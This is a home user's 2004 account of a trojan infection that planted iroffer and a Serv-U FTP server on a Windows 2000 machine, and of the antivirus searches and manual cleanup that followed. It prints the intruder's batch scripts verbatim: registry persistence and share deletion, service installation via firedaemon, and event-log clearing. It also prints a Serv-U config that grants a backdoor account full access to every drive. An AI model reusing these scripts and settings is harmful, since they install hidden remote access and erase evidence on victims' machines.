And a few seconds after I clicked the popup off, it came right back up. I tried rebooting (not easily done with the continuous popups), but that did not help, they resumed poping up.

According to http://iroffer.org/, iroffer is a software program that acts as a fileserver for IRC. It is similar to a FTP server or WEB server, but users can download files using the DCC protocol of IRC instead of a web browser.

The problem is as far as I know, I never installed such a program, and have no use for such a program.

I did use mIRC last night, for a teleconference with APCUG, and perhaps someone had a machine with iroffer installed on it, and perhaps it transferred it to my machine. I don't know any other way I would have gotten it.

I had Norton do a scan of my system, and 3 hours, 59 minutes, 35 seconds later I found No infection found

• Norton's website had two references to iroffer:
  • BAT.Boohoo.Worm is a collection of batch files and utilities that copies itself across network shares that have weak administrator passwords. The worm establishes backdoor access to a compromised system using IRC on the IRC server port 6666 or 7000. But it refers to iroffer as a "Legitimate programs and harmless data files that Symantec antivirus products do not detect", and I don't see any of the other details that they say BAT.Boohoo.Worm installs.
  • Backdoor.IRC.Zcrew.B which is a Backdoor Trojan Horse that may allow remote control of an infected system through IRC and FTP. Removal instructions were to "Run a full system scan and delete all the files detected as Backdoor.IRC.Zcrew.B or IRC Trojan. Delete the folder C:\WINNT\system32\wbem\repository\fs\macromed." But my C:\WINNT\system32\wbem\repository folder did not contain a fs folder
• McAfee / Network Associates has one reference to iroffer:
  • Iroffer application which says it is not a virus or trojan. It is a potentially unwanted program. Iroffer is a tool that serves files and offers them for IRC users to download them using the DCC protocol. They provide removal instructions for VirusScan 4.x and for VirusScan 7 or later users, but that did not do me any good, since I use Norton Anti-virus.

So Norton thinks that Iroffer is not a problem then? Then why do I see an entry in Norton's Quarantee File for: "sec.bat", "C:\WINNT\system32\ias", "7.48 KB", "Sunday, March 28, 2004 11:51:45 PM", "", "Quarantined", "SYSTEM", "DON", "SINGLETON", "BAT.Trojan"? That is approximately the time that I was infected with the Iroffer Trojan. I had no problem with the computer at 9:39 pm Sunday, when the APCUG Teleconference, where I was using mIRC, ended. And then I left the computer room and went in to watch some TV before going to bed. And when I got up the next morning, and came into the computer room, I was infected. Whether it happened during the teleconference, i.e. because of my use of mIRC, and it just took a while before the trojan launched itself, or whether there was a very strange coincidence that I would receive two email messages, one with sec.bat that Norton recognized and quarantined, and another with iroffer.exe which it let slip by, I don't know. My "C:\WINNT\system32\ias" folder does not contain a sec.bat. It does contain a sec2.bat with a Last Updated date of 2/25/2004 that contains

echo REGEDIT4>>root.reg 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg 
echo "NetworkStartup"="net share IPC$ /delete /yes">>root.reg 
echo "Secure"="net share ADMIN$ /delete /yes">>root.reg 
echo "Secure1"="net share C$ /delete /yes">>root.reg 
echo "Secure2"="net share D$ /delete /yes">>root.reg 
regedit /S root.reg 
del root.reg 
echo. 
net share ADMIN$ /delete /yes 
net share C$ /delete /yes 
net share D$ /delete /yes 
net share IPC$ /delete /yes 

I don't have a root.reg file on my computer, however that is not surprising, because the above sec2.bat file deleted it (del root.reg).

Since Norton was not of much help, and since I don't run McAfee, who provided instructions for removing it with VirusScan 4.x and other instructions for VirusScan 7 or later users, I did some searching on my machine. C:\WINNT\system32\ias had a file named iroffer.exe, and it had a "last updated" date of 2/21/2004, and there was a file run.bat with a "last updated" date of 3/18/2004 which contained:

SET MXHOME=c:\winnt\system32\ias
SET MXBIN=c:\winnt\system32\ias
c:\winnt\system32\ias\firedaemon -i Service "c:\winnt\system32\ias" "c:\winnt\system32\ias\iroffer.exe" "config.conf" Y 0 0 0 Y
c:\winnt\system32\ias\firedaemon -i serv "c:\winnt\system32\ias" "c:\winnt\system32\ias\serveu.exe" "" Y 0 0 0 Y
net start serv
net start Service
c:\winnt\system32\ias\clearlogs.exe \\127.0.0.1 -app
c:\winnt\system32\ias\clearlogs.exe \\127.0.0.1 -sys
c:\winnt\system32\ias\clearlogs.exe \\127.0.0.1 -sec
c:\winnt\system32\ias\sec.bat
c:\winnt\system32\ias\sec2.bat

Look at this graphic, and note that C:\WINNT\system32\ias contains iroffer.exe and it also contains run.bat

I could not delete it, because it was a running program, but I was able to stop the popups by renaming iroffer.exe to stopiroffer.exe and renaming run.bat to dontrun.bat

I still have something that is looking for iroffer.exe and run.bat, because I renamed them back, in order to do the screen captures for this article, and the popup again came up. I did my screen capture and renamed them back immediately. If you know anything that would help clear up exactly what happened, and what, if anything, I should do now, please let me know.

I may have figured it out. I also noticed that C:\WINNT\system32\ias has three files for a program called ServU:

• serveu.exe
• servudaemon.ini
• ServUStartUpLog.txt

Initially I did not notice them, because I am very familiar with ServU. It is a good FTP program, which I installed on the APCUG Web Servers when I was in charge of them. But I never installed it on my computer. Yet there it was: serveu.exe in my C:\WINNT\system32\ias folder, and servudaemon.ini and ServUStartUpLog.txt have Last Updated dates of 3/29/2004 7:44 AM.

ServUStartUpLog.txt contains:

Mon 29Mar04 07:43:59 - Serv-U FTP Server v3.0 - Copyright (c) 1995-2001 Cat Soft, All Rights Reserved - by Rob Beckers
Mon 29Mar04 07:43:59 - Cat Soft is an affiliate of Rhino Software, Inc.
Mon 29Mar04 07:44:00 - Using WinSock 2.0 - max. 32767 sockets
Mon 29Mar04 07:44:00 - Starting FTP Server...
Mon 29Mar04 07:44:03 - FTP Server listening on port number 444, IP 127.0.0.1, 127.0.0.1
Mon 29Mar04 07:44:03 - FTP Server listening on port number 43958, IP 127.0.0.1
Mon 29Mar04 07:44:03 - Valid registration key found

[GLOBAL]
Version=3.0.0.17
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAagAAA6vVLz5CDgL/BkJ1c2hleQZCdXNoZXk
MaxNrUsers=999
OpenFilesUploadMode=Shared
SocketKeepAlive=1
PacketTimeOut=300
ProcessID=740
[DOMAINS]
Domain1=0.0.0.0||444|j|1
[Domain1]
SignOn=C:\winnt\system32\ias\welcome.txt
User1=Owner|1|0
User2=Upload|1|0
[USER=Owner|1]
Password=CrYpTeDIRPaSs
HomeDir=c:\
TimeOut=600
Maintenance=System
Note1="Wizard generated account"
Access1=C:\|RWAMELCDP
Access2=D:\|RWAMELCDP
Access3=E:\|RWAMELCDP
Access4=F:\|RWAMELCDP
Access5=G:\|RWAMELCDP
Access6=H:\|RWAMELCDP
Access7=I:\|RWAMELCDP
Access8=J:\|RWAMELCDP
Access9=K:\|RWAMELCDP
Access10=L:\|RWAMELCDP
Access11=M:\|RWAMELCDP
Access12=N:\|RWAMELCDP
Access13=O:\|RWAMELCDP
Access14=P:\|RWAMELCDP
Access15=Q:\|RWAMELCDP
Access16=R:\|RWAMELCDP
Access17=S:\|RWAMELCDP
Access18=T:\|RWAMELCDP
Access19=U:\|RWAMELCDP
Access20=V:\|RWAMELCDP
Access21=W:\|RWAMELCDP
Access22=X:\|RWAMELCDP
Access23=Y:\|RWAMELCDP
Access24=Z:\|RWAMELCDP
[USER=Upload|1]
Password=CrYpTeDIRPaSs
HomeDir=c:\winnt\system32\ias\upload
RelPaths=1
TimeOut=600
Maintenance=Group
Access1=C:\winnt\system32\ias\upload|RWALCP

How it got installed I don't know. My ZoneAlarmPro Program List does not mention it, so somehow it must have access to the Internet that ZoneAlarmPro does not know about. Norton never heard of ServU, but McAfee had three listings:

• Backdoor.ServU-based (AVP) (from 01/10/2002)
• Backdoor.ServU.B (Central Command) (from 01/10/2002)
• ServU_Daemon application (from 05/23/2002)

They say The Serv-U FTP daemon is a popular commercial FTP server. This application has been used by many trojans for malicious purposes, where files are renamed to try to fool people into thinking that they are Windows system files. These renamed files will be picked up with regular detection within the on-access or on-demand scanners.

Files for this application that have not been renamed will require /PROGRAM detection. The current command-line scanner makes use of such detections, as does VirusScan 7.

Unfortunately I run Norton, and they don't have any removal instructions, so I just renamed the files (I could not delete them because they were in use), and then I rebooted, and deleted the files. I got a new ServUStartUpLog.txt which said Wed 31Mar04 09:31:00 - OUT-OF-DATE! This trial version of Serv-U is out-of-date! so hopefully that will prevent them from being used again. I created a shortcut for C:\winnt\system32\ias on my desktop, and will keep an eye on new stuff appearing there.

I may have made a mistake going with Norton. I checked their website for If, after running a scan, you need assistance removing a virus, or you cannot run a scan of any kind, then call our virus removal line for assistance. and the only choices they offerred were:

• Standard Consultation
  (877) 832-2811 Standard Consultation is a managed, "do-it-yourself" option that includes diagnosis and a plan of action. $39.95 US
• Premier Consultation (877) 832-2811 Premier Consultation is a full-service option that includes a diagnosis and plan of action, plus step-by-step assistance through the process. $69.95 US
• Per Minute Consultation (900) 646-0004 Access Premier Consultation services at the rate of $4.95 per minute, charged to your telephone bill. For Norton AntiVirus for Macintosh, call 900-646-0034.

They don't even offer you a way to email them to tell them that their competition has a solution for a problem and they don't, and asking them to see if they can come up with an alternative to going with their competition.

I ran McAfee FreeScan (Select McAfee FreeScan from the Free Services section)

McAfee identified one infected file C:\WINNT\system32\ias\dontrun.bat which they said had IRC-Demfire.bat which is a Trojan discovered 2/7/2003

Removal instructions were to stop two services

• FireDaemon Service: Rundll
• FireDaemon Service: svchost

I don't have Rundll running, but I have three copies of svchost running, but I can't stop any of them.

I have one copy of svchost.exe, in c:\winnt\system32. I would delete it, however it appears it may be needed. I also have a rundll32.exe, also in c:\winnt\system32 but it also appears it may be needed.

The McAfee file also referred to both Rundll and svchost being started as FireDaemon Services. FireDaemon does not appear to be a normal part of Win2K, but rather something one could install and I found another page which seemd to indicate it was involved with a compromised system, and I found a copy of it in C:\WINNT\system32\ias so I tried renaming it to another name, so it could not be found easily.

Since McAfee found my renamed "dontrun.bat" and identified it as being infected, I went ahead and deleted it and also the renamed stopiroffer.exe, and emptied my recycle bin.

For more information on the Tulsa Computer Society click here